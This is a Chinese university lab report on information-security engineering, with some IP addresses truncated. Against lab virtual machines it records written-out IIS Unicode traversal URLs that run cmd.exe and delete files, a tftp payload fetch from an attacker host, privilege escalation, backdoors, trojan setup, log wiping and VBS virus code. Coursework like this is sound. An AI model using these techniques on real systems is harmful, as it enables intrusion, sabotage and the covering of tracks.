信息安全工程实验报告_第1页
信息安全工程实验报告_第2页
信息安全工程实验报告_第3页
信息安全工程实验报告_第4页
信息安全工程实验报告_第5页
已阅读5页,还剩62页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、中南大学信息安全工程实验报告学生姓名 学 院 信息科学与工程学院 专业班级 信息安全 完成时间 2016年 月 日 目 录1. 实验131.1 实验内容31.2 实验过程32.实验272.1 实验内容72.2 实验过程73.实验3153.1 实验内容153.2 实验过程164.实验4234.1 实验内容234.2 实验背景234.3 实验过程255. 实验5365.1 实验内容365.2 实验过程366.实验6416.1 实验内容416.2 实验过程417.实验7487.1 实验内容487.2 实验背景487.3 实验过程498.实验8568.1 实验内容568.2 实验背景568.3 实验过

2、程609.实验总结66信息安全工程1. 实验11.1 实验内容抓取ping和Telnet的数据报,并简要分析IP头的结构。1.2 实验过程 安装VMware并且打开已经配置好的虚拟机。 配置VMwre虚拟机:为了使所有的网络安全攻击实验都可以成功完成,在虚拟上安装没有打过任何补丁的Windows Advanced Server 2000。启动成功后,进入操作系统,配置虚拟机上操作系统的IP地址,之前查询得到物理主机IP地址为,使之和主机能够通过网络进行通信,配置虚拟机操作系统的IP地址应与物理主机在同一网段,实验设为:3利用Ping指令来测试网络是否

3、连通。在主机的DOS窗口中输入“Ping ”,ping通截图如下: 利用wireshark抓包:Ping之前打开wireshark软件,点击开始抓包,找到主机间通信的数据包信息如下: 开启Telnet服务:Telnet给用户提供了一种通过网络登录远程服务器的方式,通过端口23工作。首先在虚拟机Telnet管理器中开启Telnet服务,在Telnet服务管理器中选择4,启动Telnet服务器。如下图所示: 虚拟机上的Telnet服务器就启动了,然后在主机的DOS窗口中连接虚拟机的Telnet服务器,如下图: 连接Telnet服务器:虚拟机上的Telnet服务器就启动了,然后

4、在主机的DOS窗口中连接虚拟机的Telnet服务器,如下图:2.实验2 2.1 实验内容 共四个案例,包括四种扫描。2.2 实验过程 2.2.1案例一:系统用户扫描实验工具可以使用工具软件:GetNTUser,该工具可以在Winnt4以及Win2000操作系统上使用,主要功能包括:(1) 扫描出NT主机上存在的用户名。(2) 自动猜测空密码和与用户名相同的密码。(3) 可以使用指定密码字典猜测密码。(4) 可以使用指定字符来穷举猜测密码。实验过程1、对IP为09的计算机进行扫描,首先将该计算机添加到扫描列表中,选择菜单File下的菜单项“添加主机”,输入目标计算机的IP地

5、址,如图所示。2、在Windows 7 上利用GetNTUser工具扫描Windows 2000 上的用户,可以获得用户列表。(此时Windows 2000上的administrator没有密码。) 3、更改Windows 2000 administrator的密码,并创建新用户xyz: 4、再次扫描结果: 5、设置字典文件:利用该工具可以对计算机上用户进行密码破解,首先设置密码字典,设置完密码字典以后,将会用密码字典里的每一个密码对目标用户进行测试,如果用户的密码在密码字典中就可以得到该密码。 6、字典测试后,administrator的密码显示出来 2.2.2案例二:开放端口扫描实验工具

6、得到对方开放了哪些端口也是扫描的重要一步。使用工具软件PortScan可以到得到对方计算机都开放了哪些端口。实验过程 对28的计算机进行端口扫描,在Scan文本框中输入IP地址,点击按钮“START”,开始扫描,在CLEAR处显示端口开放情况。 2.2.3案例三:共享目录扫描实验工具通过工具软件Shed来扫描对方主机,得到对方计算机提供了哪些目录共享。实验过程 该软件可以扫描一个IP地址段的共享信息,这里只扫描IP为28的目录共享情况。在起始IP框和终止IP框中都输入28,点击按钮“开始”就可以得到对方的共享目录了。 2.

7、2.4案例四:利用TCP协议实现端口扫描实验原理 实现端口扫描的程序可以使用TCP协议和UDP协议,原理是利用Socket连接对方的计算机的某端口,试图和该端口建立连接。如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,具体实现程序proj4_4.cpp所示。实验过程 1、在vc+中打开工程,编译,链接,在debug文件夹中形成一个EXE文件,将这个文件拷在c盘下,在控制台中运行这个文件,查看服务器ip的指定端口是否开启。 2、结果显示服务器的80端口开启,79端口关闭。3.实验33.1 实验内容共四个案例:1、使用工具软件X-Scan-v2.3进行漏洞扫描2、网络监

8、听的目的是截获通信的内容,监听的手段是对协议进行分析。使用工具软件Sniffer pro进行网络监听。3、得到管理员密码,用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用FindPass将当前登录用户的密码解码出来。4、用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。3.2 实验过程 3.2.1 漏洞扫描 扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。 设置扫描参数:利用该软件对系统存在的一些漏洞进行扫描,选择菜单栏设置下的菜单项“扫描参数”,扫描参

9、数的设置如下图 下面需要确定要扫描主机的IP地址或者IP地址段,先将虚拟机IP改到和主机同一网段中去,本次实验改成0,选择菜单栏设置下的菜单项“扫描参数”,扫描一台主机,在指定IP范围框中输入:0-0, 设置完毕后,进行漏洞扫描,点击工具栏上的图标“开始”,开始对目标主机进行扫描,扫描结果如下图: 3.2.2 网络监听 Win Sniffer专门用来截取局域网内的密码,比如登录FTP,登录Email等的密码。安装好软件Win Sniffer,打开其主界面如下图所示 设置:只要做简单的设置就可以进行密码抓取了,点击工具栏图标“Ad

10、apter”,设置网卡,这里设置为本机的物理网卡就可以, 抓取密码:在本机主机使用DOS命令行连接远程的FTP服务 会话过程:打开Win Sniffer,看到刚才的会话过程已经被记录下来了,显示了会话的一些基本信息,如下图: 3.2.3得到管理员密码 找到进程winlogon.exe 使用FindPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录,执行该程序,将得到当前用户得登录名,如下图: 3.2.4 权限提升 利用Hacker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New

11、”,在框中输入要新建的管理员组的用户名,如下图: 输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,如下图:4.实验44.1 实验内容 破解系统密码、邮件密码、word文档密码以及Unicode漏洞。4.2 实验背景4.2.1暴力破解系统密码l 暴力攻击的一个具体例子是,一个黑客试图使用计算机和信息去破解一个密码:一个黑客需要破解段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这种配备,它也将花掉八天的时间去破解加

12、密算法,实际上破解加密过程八天已是非常短暂的时间了。l 一次字典攻击能否成功,很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样可以大大的提高破解效率。l 一个字典文件本身就是一个标准的文本文件,其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件。l 字典文件为暴力破解提供了一条捷径,程序首先通过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示。4.2.2 Un

13、icode漏洞l 通过打操作系统的补丁程序,就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。l Unicode漏洞是2000-10-17发布的,受影响的版本: Microsoft IIS 5.0+Microsoft Windows 2000系列版本 Microsoft IIS 4.0+ Microsoft Windows NT 4.0l 消除该漏洞的方式是安装操作系统的补丁,只要安装了SP1以后,该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代/和而能利用./目录遍历的漏洞。 4.2.3 Unicode漏洞的检测方法l 使用扫描工

14、具来检测Unicode漏洞是否存在,使用上一章介绍的X-Scan来对目标系统进行扫描,目标主机IP为:28,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了。4.3 实验过程 4.3.1 案例一:利用字典攻击破解密码。 4.3.2 案例二:暴力破解邮箱密码 邮箱的密码一般需要设置到八位以上,否则七位以下的密码容易被破解。尤其七位全部是数字,更容易被破解。破解电子邮箱密码,一个比较著名的工具软件是:黑雨POP3邮箱密码暴力破解器,比较稳定的版本是2.3.1,主界面如图所示。 4.3.3案例三:破解Word文档密码目前许多软件都具有加密的功能,比如Offi

15、ce文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话,同样容易被破解。1.新建一个word文档 2.修改word文件权限密码 3.安装Advanced Office XP Password Recovery工具 3.该密码是三位的,使用工具软件,Advanced Office XP Password Recovery可以快速破解Word文档密码。点击工具栏按钮“Open File”,打开刚才建立的Word文档,程序打开成功后会在Log Window中显示成功打开的消息。 4.3.4 案例四:Unicode漏洞专题1.检测U

16、nicode漏洞是否存在2. 可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如: /scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir 其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图所示。3.scripts目录一般系统盘根目录下的Inetpub目录下,如图所示。4. 在Windows的目录结构中,可以使用两个点和一个斜线“./”来访问上一级目录,在浏览器中利用“scripts/././”可以访问到系统盘根目录,访问“scripts/././winnt/sy

17、stem32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。 浏览器地址栏中禁用符号“./”,但是可以使用符号“/”的Unicode的编码。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。5.此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。在NT4中/编码

18、为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af 利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入“28%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”6.利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。使用的语句是:http:/192.16

19、8.86.128/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini7.利用Unicode漏洞删除主页 利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。 使用的语句是:28/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwro

20、otdefault.asp8.利用Unicode漏洞删除主页 利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。 使用的语句是:28/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp9.拷贝文件 为了使用方便,利用语句将cmd.exe文件拷贝到scripts目录,

21、并改名为c.exe,使用的语句是:28/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe地址,点击按钮“START”,开始扫描,在CLEAR处显示端口开放情况。5. 实验55.1 实验内容入侵攻击实验。5.2 实验过程 5.2.1案例一:利用Unicode漏洞入侵系统1.上载文件: 在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一个名为“idq.dll”

22、的文件。入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。普通文件传输协议TFTP(Text File Transmission Protocol)一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图所示: 这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:“28/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+t

23、ftp+-i++get+idq.dll”命令其实是“tftp i get idq.dll”意思是从服务器上获取idq.dll文件,执行成功的界面如图所示:2.查看scripts目录 上传完毕后可以查看一下scripts目录,是否真的上传成功了。如图所示:3.入侵对方主机说明已经成功的在scripts目录中上传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:“ispc.exe 28/script

24、s/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限,入侵的过程所示:4. 建立用户 可以在对方计算机上做管理员可以做的一切事情,比如添加用户,建立一个用户名为“Hacker123”,密码也是“Hacker123”的用户,如图所示: 5.2.2 案例二:利用打印漏洞攻击利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。经过测试,该漏洞在SP2、SP3以及SP4版本上仍存在,但不能保证100%入侵成功。使用工具软件:cniis.exe,使用的语法格式是:“cniis 28 0”,第一个参数是目标的IP地址,第二参数是目标操作系统

25、的补丁号,因为28没有打补丁,这里就是0。拷贝cniis.exe文件到C盘根目录,执行程序如图所示: 5.2.3 案例三:SMB致命攻击SMB(Session Message Block,会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。还可以利用SMB协议让对方操作系统系统重新启动或者蓝屏。使用的工具软件是:SMBDie V1.0,

26、该软件对打了SP3、SP4的计算机依然有效,必须打专门的SMB补丁。攻击的时候,需要两个参数:对方的IP地址和对方的机器名,窗口中分别输入这两项,软件的主界面如图所示:6.实验66.1 实验内容网络服务实验:远程启动Telnet服务,获得管理员密码和建立web和Telnet服务。6.2 实验过程 6.2.1 案例一:远程启动Telnet服务1.远程开启对方的Telnet服务 利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。 设置管理员密码():2.在主机上远程登录虚拟机,命令的语法是:“cscript RTCS.vbe 192.1

27、68.86.128 administrator 1 23” 开启远程主机Telnet服务的过程如图:3.确认对话框 在DOS提示符下,登录目标主机的Telnet服务,首先输入命令“Telnet 28”,因为Telnet的用户名和密码是明文传递的,首先出现确认发送信息对话框。如图所示:4.登录Telnet的用户名和密码 输入字符“y”,进入Telnet的登录界面,需要输入主机的用户名和密码,如图所示: 6.2.2 案例二:记录管理员口令修改过程 当入侵到对方主机并得到管理员口令以后,就可以对主机进行长久入侵了,但是一个好的管理员一般每隔半个月左右就会修改一次密码,这样已经

28、得到的密码就不起作用了。 利用工具软件Win2kPass.exe记录修改的新密码,该软件将密码记录在Winnttemp目录下的Config.ini文件中 该工具软件是有“自杀”的功能,就是当执行完毕后,自动删除自己。 首先在对方操作系统中执行Win2KPass.exe文件,当对方主机管理员密码修改并重启计算机以后,就在Winnttemp目录下产生一个ini文件,如图所示: 6.2.3 案例三:建立Web服务和Telnet服务 使用工具软件wnc.exe可以在对方的主机上开启两个服务:Web服务和Telnet服务。其中Web服务的端口是808,Telnet服务的端口是707。执行很简单,只要在对

29、方的命令行下执行一下wnc.exe就可以,如图所示: 执行完,利用命令“netstat -an”查看开启的808和707端口,如图所示: 1.测试Web服务 首先测试Web服务808端口,在浏览器地址栏中输入“http:/ 28:808”,出现主机的盘符列表,如图所示:2.看密码修改记录文件 可以下载对方硬盘设置光盘上的任意文件, 可以到目录下查看对方密码修改记录文件。3.利用telnet命令连接707端口 输入命令:“telnet 28 707”。4.登录到对方的命令行 无需任何用户名和密码即可登陆,如图所示:7.实验77.1 实验内容常见的简

30、单木马有NetBus远程控制、“冰河”木马、PCAnyWhere远程控制等等。这里介绍一种最常见的木马程序:“冰河”。使用“冰河”进行远程控制。7.2 实验背景7.2.1 木马l 木马是一种可以驻留在对方系统中的一种程序。l 木马一般由两部分组成:服务器端和客户端。l 驻留在对方服务器的称之为木马的服务器端,远程的可以连到木马服务器的程序称之为客户端。l 木马的功能是通过客户端可以操纵服务器,进而操纵对方的主机。7.2.2 木马和后门的区别l 木马程序在表面上看上去没有任何的损害,实际上隐藏着可以控制用户整个计算机系统、打开后门等危害系统安全的功能。l 搜热点新闻时常会误入些莫名其妙的小网站,

31、不仅找不到相关的内容,还给电脑招来大批木马。l 所谓“木马站”,即黑客专门用来放置网页木马的网站,一般是由黑客租用服务器建立而成,还有一部分是黑客通过漏洞入侵并“霸占”其他网站的服务器。黑客把恶意代码嵌入到网页中,如果访问该网页的网友电脑存在安全漏洞,就会自动下载运行黑客指定的木马程序。7.2.3 清除日志l 电影中通常会出现这样的场景,当有黑客入侵计算机系统的时候,需要全楼停电来捉住黑客,为什么停电就可以逮住黑客呢?这是因为当黑客入侵系统并在退出系统之前都会清除系统的日志,如果突然停电,黑客将没有机会删除自己入侵的痕迹,所以就可以抓住黑客了。l 清除日志是黑客入侵的最后的一步,黑客能做到来无

32、踪去无影,这一步起到决定性的作用。 7.3 实验过程“冰河”包含两个程序文件,一个是服务器端,另一个是客户端。“冰河8.2”得文件列表如图所示。“冰河”的客户端:win32.exe文件是服务器端程序,Y_Client.exe文件为客户端程序。将win32.exe文件在远程得计算机上执行以后,通过Y_Client.exe文件来控制远程得服务器,主界面如图。将服务器程序种到对方主机之前需要对服务器程序做一些设置,比如连接端口,连接密码等。选择菜单栏“设置”下的菜单项“配置服务器程序”,如图所示。在出现的对话框中选择服务器端程序win32.exe进行配置,并填写访问服务器端程序的口令,这里设置为“”

33、,如图。执行完win32.exe文件以后,系统没有任何反应,其实已经更改了注册表,并将服务器端程序和文本文件进行了关联,当用户双击一个扩展名为txt的文件的时候,就会自动执行冰河服务器端程序。没有中冰河的情况下,该注册表项应该是使用notepad.exe文件来打开txt文件,而 “SYSEXPLR.EXE”其实就是“冰河”的服务器端程序。目标主机中了冰河了,可以利用客户端程序来连接服务器端程序。在客户端添加主机的地址信息,这里的密码是就是刚才设置的密码“”如图所示。点击按钮“确定”以后,查看对方计算机的基本信息了,对方计算机的目录列表如图所示。从图中可以看出,可以在对方计算机上进行任意的操作。

34、除此以外还可以查看并控制对方的屏幕等等,如图所示。当用户访问某个IIS服务器以后,无论是正常的访问还是非正常的访问,IIS都会记录访问者的IP地址以及访问时间等信息。这些信息记录在WinntSystem32logFiles目录下最简单的方法是直接到该目录下删除这些文件夹,但是全部删除文件以后,一定会引起管理员的怀疑。一般入侵的过程是短暂的,只会保存到一个Log文件,只要在该Log文件删除所有自己的记录就可以了。使用工具软件CleanIISLog.exe可以做到这一点,首先将该文件拷贝到日志文件所在目录,然后执行命令“CleanIISLog.exe ex.log 10”,第

35、一个参数ex.log是日志文件名,文件名的后六位代表年月日,第二个参数是要在该Log文件中删除的IP地址,也就是自己的IP地址。先查找当前目录下的文件,然后做清楚的操作,整个清除的过程如下所示。主机日志包括三类的日志:应用程序日志、安全日志和系统日志。可以在计算机上通过控制面板下的“事件查看器”查看日志信息,如图所示。使用工具软件clearel.exe,可以方便的清除系统日志,首先将该文件上传到对方主机,然后删除这三种日志的命令格式为:Clearel System Clearel SecurityClearel ApplicationClearel All这四条命令分别删除系统日志、安全日志、

36、应用程序日志和删除全部日志。执行完毕后,再打开事件查看器,发现都已经空了。8.实验88.1 实验内容用WinRoute创建包过滤规则。8.2 实验背景 8.2.1脚本病毒l 脚本(Script)病毒是以脚本程序语言编写而成的病毒,主要使用的脚本语言是VBScript和JavaScript。VBScript是Visual Basic Script的简称,即Visual Basic 脚本语言,有时也被缩写为VBS。因为VBScript 是微软公司出品的脚本语言,因此Windows下大部分脚本病毒都使用VBS编写。例如,爱虫病毒、新欢乐时光病毒等都是用VBScript编写的,称做VBS脚本病毒。l

37、脚本病毒编写比较简单,并且编写的病毒具有传播快、破坏力大等特点。但脚本病毒必须通过Microsoft的WSH(Windows Scripting Host,Windows脚本宿主)才能够启动执行以及感染其他文件。l VBS病毒流行的另一个原因是,VBS程序在Windows环境下运行非常方便,在文本文件中输入代码,将文件的保存为“*.VBS”,双击就可以执行。例如在在文本文件中输入:MsgBox Hello VBS,保存成“a.vbs”,双击就可以执行。l 曾经广为流传的“新欢乐时光”病毒,将自己的代码附加在HTML文件的尾部,并在顶部加入一条调用病毒代码的语句。这里实现该病毒的部分感染功能,只感染病毒所在目录下的所有HTML文件,在HTML文件后面加上代码。l 代码举例:遇到错误继续执行On error resume next定义变量Dim fso,curfolder,curfile定一个文件操作对象Set fso = createobject(scripting.filesystemobject)得到当前目录Set curfolder = fso.GetFolder(.)

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论